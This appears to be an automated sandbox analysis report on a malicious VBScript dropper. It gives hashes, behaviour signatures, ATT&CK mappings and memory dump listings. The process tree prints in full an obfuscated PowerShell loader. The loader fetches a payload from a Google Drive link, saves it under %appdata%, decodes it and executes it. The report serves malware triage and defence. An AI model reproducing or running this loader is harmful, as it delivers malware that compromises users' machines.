24220410bffece94d6ad483d61e540ee6b0fcc2d9be690d3b03d4b2b37ba07cb

General

Target

24220410bffece94d6ad483d61e540ee6b0fcc2d9be690d3b03d4b2b37ba07cb.vbs
Size

8KB
MD5

78a3e500aa75424e4494cc24d8d2b1f3
SHA1

99b288b4dc02152cedcedd4f40752d55696f8eb1
SHA256

24220410bffece94d6ad483d61e540ee6b0fcc2d9be690d3b03d4b2b37ba07cb
SHA512

e23f3d60b1e12665363c75682244c6d30d23695ae838bdff138c840ee376e52f5aff168b29f88d645f17c2eb601c4fe485d0f1222f68b56891f98d5c41c5bf28
SSDEEP

192:s1dltIbgm2ZXmtIjR0RvYxI+MSA/T5deSIMU6O:ulKbgm2WIjRsYK+gbNIIO

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2912	powershell.exe
7	2912	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2912	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2912	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2004 wrote to memory of 2912	2004	WScript.exe	28
PID 2004 wrote to memory of 2912	2004	WScript.exe	28
PID 2004 wrote to memory of 2912	2004	WScript.exe	28
PID 2912 wrote to memory of 2604	2912	powershell.exe	30
PID 2912 wrote to memory of 2604	2912	powershell.exe	30
PID 2912 wrote to memory of 2604	2912	powershell.exe	30

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\24220410bffece94d6ad483d61e540ee6b0fcc2d9be690d3b03d4b2b37ba07cb.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2004
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$naboiO,onprvQuenteB,llerRedfirDrouge ChamaHjem c redhNedlg1Tvist6Physo1Hespe)Taleg ');Multikunsts (Phenolsulphonate 'Multi$ BogpgMahoglForudounsolbYmpnia,angblSynta:ernriT ,esueAddergfy kllAn ipvA bitrLamelkNummesHeatea.agterNum.rbButyreOverfjCurvid ImmueInimisUnidi=C ris$HomosU ForhnC ondb LivsaU.nacpGnis t Vil,iSm.llsEklateunbra.Cu sosSquilpUdflylDrowniOppilthypoc(Vider$k.nceP Der,oHalfll Do ee LarymTr thi Fde.sectroeLand,rFondsef,sibsFabri)Diskk ');$Unbaptise=$Teglvrksarbejdes[0];Multikunsts (Phenolsulphonate 'Bruge$Reg,lgD.ouglIllegoqueneb mustaSo.welUni,t:blankH OrgavAccule StetdSiddeeSti umGavageIntimlBloms= seneNMag.seArbejwKo ce-SplitOApostb.aratjNonnae ayercInfo tDudel A,tomSFerieyBrus s ,asttM,croe ektm K,rs.DomstN LovpeGur dtRentr.FodboWStrope abonb SmilC,utoklNecroiDe oreH,mannFjerptsamme ');Multikunsts (Phenolsulphonate 'Emp.t$ PrimHImpervInfleeSkaerdUhv seFactumKi gheGrns.lBenyt.T iolHpr.deeNybega Selvd Impoe Sjo.rAntissCo se[ Disk$Rigi.DAren.i affegIridotWor he,eutrr NyheiScutisWorkwkRingleElect]Rando=Tempe$Nit,hHun,inyDimpsdMarihrBottooNytthrChr shS,akki addezstaalaFrste ');$Trichomatosis=Phenolsulphonate ' RadiHInstrvDemulePreexdTolueeFe lvmUnra.ePrimalUdsen.C.untD Tw,noMuddyw ovanSiam.lPertioFlydeastrmkdT.abeFPictuiPatrolLan.beBetyd(Tandp$PlougUFerlinOpbygb OssiaRallypUdtr.t GiviiFlabesUndepe Pist,Dyrep$ReforSLoftekVin srkmperd dr.wdor alePeskyr apo.eTraadrFilteeArresnSans,dEnrinet,anssCardi) Fi,k ';$Trichomatosis=$funktionstegningens[1]+$Trichomatosis;$Skrddererendes=$funktionstegningens[0];Multikunsts (Phenolsulphonate ' Klud$ProdugSmeltlReovioEpanobUnpreaToteml rum: ugenhElocuefotogl D spi fteu M,utmVurdeeBurthtBladds D kn= Leje( urisTHeelle.etrasKontitD.tin-Fort,PPreveaherret Dellh,rger A ros$RefleSPlastkovinerDiverdrumbud DowcePretrrBev deS ammrFor.ue forknKristdRegleeKommusDupsk)omstn ');while (!$heliumets) {Multikunsts (Phenolsulphonate 'Vager$Anbrig .ewilBilraoOrmazb lukaAllerl .ndi:KetupE demonlitzdvVanadeDyr hjKabins D agkTrenco HellmRech.mHa esu,eedinBjergi Uni,kSupera rypttSol niFlaado,igmenVedheeHyfeunO inesHager=Disen$EksamtG.melr Sekvusign.e pneu ') ;Multikunsts $Trichomatosis;Multikunsts (Phenolsulphonate 'MiscoSPoroct S.ssaLophorflyvetCalyc-PrescS P.eslBeslue.kelleProvspProvi Spal.4Hv.sk ');Multikunsts (Phenolsulphonate 'Syne.$premogN.taal uttoo TrimbKnobuaProfel Kryd:HmosthNonpeeSeatwlIken,iH ldbuStyptmOut.leL kertOvertsUnch.= Disl(TrombTSpr neZoothsCoop t.enna-FrustPPrustaSo rctFiksehVrigh Radio$ArendSBin,mkTrff rhumhudBoatsdFingee,orskrHost,eReadirFors,ePlatonTor,tdUnfureBathys Japo)Strep ') ;Multikunsts (Phenolsulphonate 'Frema$DiphegAge dlJustioIsophbGenina SniplMassa: Lo,aI epefnBroadtTer.orjonosaChromnEffers TrypiPinkitKompei wa.nvboot.ebromilOpslay Fesc=Arnfr$TraskgStranl lesio Han,bAttesa Lua lDogtr:ForbrF.avnea bad.sEpicetPetarlNucleg unstg,irmaehellelKolonsThiopeGlubhrM.ttenLi laeJubbesSladr+excus+ So,s%Stenc$UnburTThickeKrig gScavelB ssevAgterrOsprekP.antsV rieaI oburUnsupbAnodieTan,sj .imed Omste Rek,sKirke.LagtecLoxodoLeptiuAdvecn Acyltre,ol ') ;$Unbaptise=$Teglvrksarbejdes[$Intransitively];}Multikunsts (Phenolsulphonate 'Boot.$ ArkigAnalylClamaoPetrob DragaattaclRegen:KonjuRGadekePresie S.olvundubiTongmdBra.ceS.cernLjertc demoeFilmk .bre= Spo, kerygG ha.ieFrosttWilli-KopisC Systo NonenPrfertKorpueThrean log,tLacew Sper.$ ArgySDe.takov.rprSkjoldPounddKa ege rapr FyreeKon.rrTo deeDuodrnBl dgdMotioeDelins Snug ');Multikunsts (Phenolsulphonate 'Coppe$.illeg ShamlS.ampo.sksnbM skiaFu igldefen:Tr,inACowpadHoc,er,tovteTillgnMyoloaUnautl,ampeeLydincBalant.topfo CentmOu ruyOvert Spumo=Marke Null[Srg dSFabuly noggsUdefrtDromeePr,apmUnfra.ScreeCSl,beoAlantnA canvUfremeMus.irReacktCandy]Areol:Vanro:de.ilFSkovmrFrodio,roatmUv.nnBPern.a B,ozsSubeleInter6 krmm4.eviaSPos,mtp.etirKnlfti,ertin M tagT lla( B mb$ MonoRAdganeEditaeAftrrvUnproiIndgidIntereeksponUn.ercTapwoeNeo o)Arun, ');Multikunsts (Phenolsulphonate ' Opdi$RattogSme,glhidsio Ldreb Sp daForcel Arbo:dualiD RebeyOestrrS traeLandbpH,anda.nthrrNeo,hkNatioeAurelnSky,d Neu.=Fa,at Infer[AngelSSuperyUnpursCropptHumpleVi.kemautoi.AutocTHorseeKontox BundtAf ek.SpyttESvmmenMyriccDeu,eoDybdedCho.di Wiren kavag Vitt]athir:Regns: offeALuannSEncykCUlt.aIsequeICoxit.Kit.yGSpoereNr.sttN.neqSAfluktFl.ntrCleidi CiganPu itg kreo(Quill$Ekse Aknibtd ElekrAlisoePosttnRekreaTranslIndkoeUdskac FjodtPlan,oC lqum Mo ayVelvi)Skrat ');Multikunsts (Phenolsulphonate 'Ante.$.eatlgStrailadmo.oTran,bR,sula Sal lKostu:,orteR CavauVgav tNs.ebtRecgee aduldBonde1,urit7 Zion2Hgted= dmin$BltedDKbes.yUncomrSu.akehighbpScutkaPseudr ,avokGle.me,eotrn Opsl.So,acs,priluTunnebTernssSlvrvtInsusr Bul.i kulnBrgedgFarmb(Posit2Skuff9 Impl4Bello9 Hils2Edwar8Naomi,Amman2 Dors6neddy9 hakk8Jeopa7 ono)Pross ');Multikunsts $Rutted172;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2912
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Amarantfarvers.Bip && echo $"
    3⤵
    PID:2604

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2912-4-0x000000001B830000-0x000000001BB12000-memory.dmp

Filesize
2.9MB

Download
memory/2912-5-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp

Filesize
9.6MB

Download
memory/2912-7-0x0000000002C70000-0x0000000002CF0000-memory.dmp

Filesize
512KB

Download
memory/2912-6-0x00000000027A0000-0x00000000027A8000-memory.dmp

Filesize
32KB

Download
memory/2912-8-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp

Filesize
9.6MB

Download
memory/2912-10-0x0000000002C70000-0x0000000002CF0000-memory.dmp

Filesize
512KB

Download
memory/2912-9-0x0000000002C70000-0x0000000002CF0000-memory.dmp

Filesize
512KB

Download
memory/2912-11-0x0000000002C70000-0x0000000002CF0000-memory.dmp

Filesize
512KB

Download
memory/2912-12-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp

Filesize
9.6MB

Download
memory/2912-13-0x0000000002C70000-0x0000000002CF0000-memory.dmp

Filesize
512KB

Download
memory/2912-14-0x0000000002C70000-0x0000000002CF0000-memory.dmp

Filesize
512KB

Download
memory/2912-15-0x0000000002C70000-0x0000000002CF0000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing